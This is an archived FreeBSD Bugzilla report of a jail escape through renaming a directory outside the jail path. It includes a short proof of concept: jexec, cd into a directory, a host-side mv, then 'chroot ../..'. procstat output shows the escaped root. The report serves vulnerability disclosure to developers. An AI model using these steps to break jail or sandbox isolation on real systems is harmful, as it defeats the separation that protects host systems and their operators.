[Bug 285782] Jail escape via directory rename outside of jail $path.

Reply: bugzilla-noreply_a_freebsd.org: "[Bug 285782] Jail escape via directory rename outside of jail $path."
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 285782] Jail escape via directory rename outside of jail $path."
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 285782] Jail escape via directory rename outside of jail $path."
Reply: bugzilla-noreply_a_freebsd.org: "[Bug 285782] Jail escape via directory rename outside of jail $path."
Go to: [ bottom of page ] [ top of archives ] [ this month ]

From: <bugzilla-noreply_at_freebsd.org>
Date: Sun, 30 Mar 2025 16:33:18 UTC

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=285782

            Bug ID: 285782
           Summary: Jail escape via directory rename outside of jail
                    $path.
           Product: Base System
           Version: 14.2-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: crest@rlwinm.de

When a jail is created with a jail root path resolving to a directory that is
not a mountpoint the jail root directory has a parent directory on the same
filesystem. If a jailed process has a working directory that is *NOT* the
jail's root directory (or any parent root directory) and said directory is
renamed out of the jail root directory (e.g. some confused host process
renaming a directory from the jails "$path/tmp" to the real "/tmp", an operator
moving a PostgreSQL database cluster directory between jails, etc.) then the
jailed process has a working directory those "../../../../../"... no longer
includes any of the jail root directories applying to the jailed process.

The exploit could be as simple as this:

First attach to a jail:
# jexec -Uroot poc2
# mkdir -vp /mnt
# cd /mnt

In a second shell move the jail's "/mnt" out of the jail
# mv /jails/poc2/mnt /jails

Back in the original jailed shell:
# chroot ../..
# procstat -f $$
  PID COMM                FD T V FLAGS    REF  OFFSET PRO NAME
 7484 sh                text v r r-------   -       - -   /bin/sh
 7484 sh                ctty v c rw------   -       - -   /dev/pts/5
 7484 sh                 cwd v d r-------   -       - -   /
 7484 sh                root v d r-------   -       - -   /
 7484 sh                jail v d r-------   -       - -   /jails/poc2
 7484 sh                   0 v c rw------  13 1677336 -   /dev/pts/5
 7484 sh                   1 v c rw------  13 1677336 -   /dev/pts/5
 7484 sh                   2 v c rw------  13 1677336 -   /dev/pts/5
 7484 sh                  10 v c rw------   1       0 -   /dev/pts/5
# at now
logger 'GAME OVER!'

-- 
You are receiving this mail because:
You are the assignee for the bug.